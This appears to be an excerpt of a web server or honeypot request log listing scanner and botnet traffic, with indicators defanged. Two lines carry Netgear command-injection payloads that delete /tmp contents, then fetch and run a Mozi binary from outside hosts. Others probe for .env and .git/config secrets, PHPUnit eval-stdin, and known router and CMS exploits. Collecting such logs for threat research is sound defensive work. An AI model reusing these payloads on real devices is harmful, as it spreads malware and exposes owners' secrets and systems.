1 GET /scripts/config/env/development.js HTTP/1.1
2 GET /scripts/config/env/production.js HTTP/1.1
2 GET /scripts/config/env/staging.js HTTP/1.1
2 GET /scripts/config/env/testing.js HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//119[.]36[.]198[.]95:45709/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shared/.env HTTP/1.1
1 GET /site/.env HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sources/.env HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /static%2e%2e/.env HTTP/1.1
1 GET /static%2e%2e/env HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /uploads/.env HTTP/1.1
1 GET /v1/.env HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /venv/lib/.git/config HTTP/1.1
1 GET /web/.env HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
2 HEAD / HTTP/1.1
1 HEAD / HTTP/1.0
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /_ignition/execute-solution HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
1 POST /sdk HTTP/1.1
3 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//deannecameron[.]website/96474830169b75e08e6130f64d8e7614b8aec1bda5f78195bf4ab18292f67512da2bcaa61b00fa19bbb28f79ceb95a20542203416a04fd9beaafcee184682bc2e6c2f19146a91b37d121c21d6d5a0bb813deb79bc26ec4b7ab7ae8330f09d782 HTTP/1.1
1 POST http[:]//jaymelevitz[.]fun/93bfad8fad31f5d5445ab60038144599c69b491d3714e77ad43f9ba5546a6b351db7835b544043cbc090ac7102b44dd4d7e2b56efdce6533b2b29f19e0e7b70b56c80cc654cc7f06f9ab5e0af67a016d6a2753e496aa65dd32ef493d48a42fb0 HTTP/1.1